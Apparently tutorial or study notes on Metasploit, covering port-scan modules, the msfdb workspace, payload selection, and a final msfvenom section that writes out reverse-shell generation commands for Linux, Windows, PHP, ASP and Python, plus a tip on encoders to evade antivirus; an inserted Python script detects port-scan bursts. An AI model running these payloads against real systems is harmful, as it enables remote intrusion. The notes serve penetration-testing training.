Exploitation

Exploitation using Metasploit.

Scanning

Metasploit has many modules for port scanning; these can be listed with search portscan from msfconsole. Port scanning modules usually require some options to be set, such as:

  • CONCURRENCY : number of ports to be scanned simultaneously

  • PORTS : port range to be scanned. Note that the default differs from nmap: nmap scans the 1000 most commonly used ports, whereas Metasploit scans ports 1 to 10,000.

  • RHOSTS : target to scan

  • THREADS : number of threads to be used simultaneously

The /scanner/discovery/udp_sweep module allows quick identification of UDP services, such as DNS or NetBIOS.

The smb_enumshares and smb_version modules can be useful in corporate networks.
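As an added example from the detection side (not part of these notes): a scan driven by the THREADS and CONCURRENCY options above produces a burst of connections to many distinct ports on one host from one source, and this Python script flags such bursts in connection log lines. The log format, the sample lines, the 10-second window and the 8-port threshold are all constructed for illustration.

```python
"""Added example (not from the original notes): flag port-scan bursts in
connection logs.  A Metasploit portscan module with a high THREADS value
touches many distinct ports on one host in a short window; this detector
counts distinct destination ports per (src, dst) pair inside a sliding
time window and reports pairs that cross a threshold.  Log format and
values below are constructed for the example."""
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> <flags>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 192.0.2.10 -> 198.51.100.5:22 SYN
2024-05-01T10:00:00 192.0.2.10 -> 198.51.100.5:23 SYN
2024-05-01T10:00:01 192.0.2.10 -> 198.51.100.5:25 SYN
2024-05-01T10:00:01 192.0.2.10 -> 198.51.100.5:80 SYN
2024-05-01T10:00:02 192.0.2.10 -> 198.51.100.5:110 SYN
2024-05-01T10:00:02 192.0.2.10 -> 198.51.100.5:139 SYN
2024-05-01T10:00:03 192.0.2.10 -> 198.51.100.5:443 SYN
2024-05-01T10:00:03 192.0.2.10 -> 198.51.100.5:445 SYN
2024-05-01T10:00:04 192.0.2.10 -> 198.51.100.5:3306 SYN
2024-05-01T10:00:04 192.0.2.10 -> 198.51.100.5:8080 SYN
2024-05-01T10:00:05 192.0.2.77 -> 198.51.100.5:443 SYN
2024-05-01T10:03:00 192.0.2.77 -> 198.51.100.5:80 SYN
"""

def parse_line(line):
    """Return (timestamp, src, dst, port) for one constructed log line."""
    ts, src, _arrow, dst_port, _flags = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port)

def detect_port_scans(log_text, window_s=10, min_ports=8):
    """Return {(src, dst): distinct_port_count} for pairs that hit at
    least `min_ports` distinct ports within any `window_s` second span.
    The window and threshold are illustrative assumptions."""
    recent = defaultdict(deque)   # (src, dst) -> deque of (ts, port)
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = parse_line(line)
        q = recent[(src, dst)]
        q.append((ts, port))
        # Drop events older than the window, measured from this event.
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        distinct = {p for _, p in q}
        if len(distinct) >= min_ports:
            alerts[(src, dst)] = max(alerts.get((src, dst), 0), len(distinct))
    return alerts

if __name__ == "__main__":
    for (src, dst), n in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst} ({n} distinct ports)")
```

The second source in the sample touches only two ports three minutes apart and is not reported, which is the trade-off a slow scan exploits; lowering THREADS stretches the burst, so the window and threshold should be tuned to the traffic being monitored.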

Metasploit Database

The Metasploit Database can be used to simplify attacking several targets. To initialise it, run systemctl start postgresql followed by msfdb init. To verify it is running, enter msfconsole and run db_status.

On launch you will be in the default workspace; this can be verified by typing workspace. A workspace can be added with workspace -a or removed with workspace -d, and you can switch between workspaces with workspace [workspace_name].

In a database-backed Metasploit session, help lists the Database Backend Commands. Running db_nmap saves all scan results to the database, and information on the discovered hosts and services can then be viewed with hosts or services respectively. Running hosts -R sets RHOSTS to the listed host(s).

Vulnerability Scanning

Metasploit allows quick identification of critical vulnerabilities that can be considered "low hanging fruit": typically any easily exploitable vulnerable service that would give a foothold on a server or even high-level privileged access. The better you are at scanning and fingerprinting a service, the easier it will be to identify critical vulnerabilities.

Exploiting

Once you have selected an exploit, you can either use the default payload or choose one with show payloads followed by set payload [payload_name | line_number].

Msfvenom

Msfvenom allows you to generate your own payloads. It provides access to all payloads available in Metasploit and can output them in many different formats for many different systems. Msfvenom can generate a stand-alone executable or a raw-format payload; the supported outputs can be listed with msfvenom --list formats.

Encoders can be applied with the -e option to try to evade antivirus, although in most cases modern obfuscation or injection methods are far more effective.

An example command to generate a generic PHP reverse shell is: msfvenom -p php/reverse_php LHOST=[IP_ADDR] LPORT=[PORT] -f raw > reverse_shell.php. The output will be missing the opening PHP tag and the closing tag; these should be added to turn it into a working PHP file.

Commonly used examples follow. In these, LHOST is the IP address of your attacking machine and LPORT is the port your handler listens on:

For Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f elf > rev_shell.elf

Note for this one: an .elf file on Linux is the equivalent of an .exe on Windows. Once it is uploaded, make sure it has executable permissions by running chmod +x rev_shell.elf.

For Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f exe > rev_shell.exe

For PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f raw > rev_shell.php

For ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f asp > rev_shell.asp

For Python:

msfvenom -p cmd/unix/reverse_python LHOST=[IP_ADDR] LPORT=[PORT] -f raw > rev_shell.py